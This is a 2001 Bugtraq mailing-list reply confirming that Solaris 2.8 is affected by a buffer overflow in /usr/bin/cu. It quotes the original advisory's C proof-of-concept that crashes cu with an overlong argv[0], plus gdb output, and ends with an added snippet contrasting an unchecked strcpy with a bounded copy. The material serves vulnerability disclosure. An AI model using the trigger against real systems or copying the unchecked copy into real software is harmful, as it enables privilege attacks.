[18700] in bugtraq
Re: Solaris /usr/bin/cu Vulnerability
daemon@ATHENA.MIT.EDU (Tomas Cibulka)
Thu Jan 18 18:36:58 2001
Mail-Followup-To: Tomas Cibulka <shock@hq.alert.sk>, bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-Id: <20010118201910.A28768@hq.alert.sk>
Date: Thu, 18 Jan 2001 20:19:10 +0100
Reply-To: Tomas Cibulka <shock@HQ.ALERT.SK>
From: Tomas Cibulka <shock@HQ.ALERT.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <3A65F3DC.74ABDB17@afip.gov.ar>; from psor@AFIP.GOV.AR on Wed, Jan 17, 2001 at 04:34:52PM -0300
HI
Solaris 2.8 seems to be also affected by this bug.
But you can gain only uucp rights in a default installation.
bye
On Wed, Jan 17, 2001 at 04:34:52PM -0300, Pablo Sor wrote:
> Description
>
> The /usr/bin/cu command contains a buffer overflow. The problem occurs
> when it copies its own name ( argv[0] ) to an internal variable without
> checking its length, and this causes the overflow.
>
> Vulnerable Versions
>
> Sun Solaris 2.4
> Sun Solaris 2.5
> Sun Solaris 2.5.1
> Sun Solaris 2.6
> Sun Solaris 2.7
>
> (Dont know about Solaris 2.8)
>
> Technical Description
>
> #include <stdio.h>
> #include <stdlib.h>   /* malloc, atoi */
> #include <string.h>   /* memset */
> #include <unistd.h>   /* execl */
>
> /* Runs /usr/bin/cu with an argv[0] of the requested length, filled with 'A'. */
> int main(int argc, char **argv)
> {
> char *buf;
> int len;
>
> if (argc != 2 || (len = atoi(argv[1])) < 1)
> return 1;
> buf = (char *) malloc(len * sizeof(char));
> memset(buf, 0x41, len - 1);
> buf[len - 1] = 0;
> execl("/usr/bin/cu", buf, (char *)0);
> return 1; /* only reached if execl fails */
> }
>
> $ uname -a
> SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5
>
> $ ./cu-demo 4000
> Segmentation Fault (core dumped)
>
> $ gdb ./cu-demo --core=core
>
> GNU gdb 4.17
> Copyright 1998 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you are
> welcome to change it and/or distribute copies of it under certain conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for details.
> This GDB was configured as "sparc-sun-solaris2.5.1"...
> warning: core file may not match specified executable file.
> Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
> Program terminated with signal 11, Segmentation Fault.
> #0 0xef62901c in ?? ()
> (gdb) info registers
> g0 0x0 0
> g1 0xef628d24 -278754012
> g2 0x0 0
> g3 0x0 0
> g4 0x0 0
> g5 0x0 0
> g6 0x0 0
> g7 0x0 0
> o0 0x137a4 79780
> o1 0xef792a88 -277271928
> o2 0x0 0
> o3 0x0 0
> o4 0x0 0
> o5 0xef792a88 -277271928
> sp 0xefffecb0 -268440400
> o7 0x31b48 203592
> l0 0x7efefeff 2130640639
> l1 0x81010100 -2130640640
> l2 0xff000000 -16777216
> l3 0xff0000 16711680
> l4 0xff00 65280
> l5 0x81010100 -2130640640
> l6 0x7 7
> l7 0xef7927d4 -277272620
> i0 0x39000 233472
> i1 0xeffffec4 -268435772
> i2 0x38088 229512
> i3 0x41414141 1094795585
> i4 0x2f 47
> i5 0x0 0
> fp 0xefffecf0 -268440336
> i7 0x137a4 79780
> y 0x0 0
> psr 0x4400086 71303302
> wim 0x0 0
> tbr 0x0 0
> pc 0xef62901c -278753252
> npc 0xef628ffc -278753284
> fpsr 0x0 0
> cpsr 0x0 0
>
>
> Pablo Sor
> psor@afip.gov.ar
--
------------------------------------------------------------------------
/| Tomas Cibulka
'o.O'
=(___)= E-MAIL : shock@alert.sk
U URL : hq.alert.sk/~shock - this is my www page
PGP KEY : finger shock@hq.alert.sk
-----------------------------------------------------------------------
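The unchecked argv[0] copy the quoted advisory describes, beside a bounded version that refuses to overflow, as an added illustration; this is not code from either poster or from Solaris cu, and the buffer name, its size and the helper names are assumptions:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PROGNAME_MAX 64   /* assumed size of the internal name buffer */
static char progname[PROGNAME_MAX];

/* Vulnerable pattern from the advisory: argv[0]'s length is never checked,
 * so a name of PROGNAME_MAX bytes or more writes past the buffer.
 * Shown for contrast only; nothing below calls it. */
void set_progname_unchecked(const char *argv0)
{
    strcpy(progname, argv0);
}

/* Hardened version: bounded, always NUL-terminated, reports truncation.
 * Returns 0 on success, -1 if the name had to be cut. */
int set_progname_checked(const char *argv0)
{
    size_t len = strlen(argv0);
    if (len >= sizeof progname) {
        memcpy(progname, argv0, sizeof progname - 1);
        progname[sizeof progname - 1] = '\0';
        return -1;
    }
    memcpy(progname, argv0, len + 1);
    return 0;
}

const char *get_progname(void) { return progname; }

/* Builds an n-byte name of 'A's (constructed input, mirroring the advisory's
 * "./cu-demo 4000" run) and returns the bounded copy's result. */
int try_argv0_of_length(size_t n)
{
    char *name = malloc(n + 1);
    if (name == NULL)
        return -2;
    memset(name, 'A', n);
    name[n] = '\0';
    int rc = set_progname_checked(name);
    free(name);
    return rc;
}

int main(void)
{
    if (try_argv0_of_length(4000) != 0)
        fprintf(stderr, "argv[0] too long; stored \"%.8s...\"\n", get_progname());
    return 0;
}
```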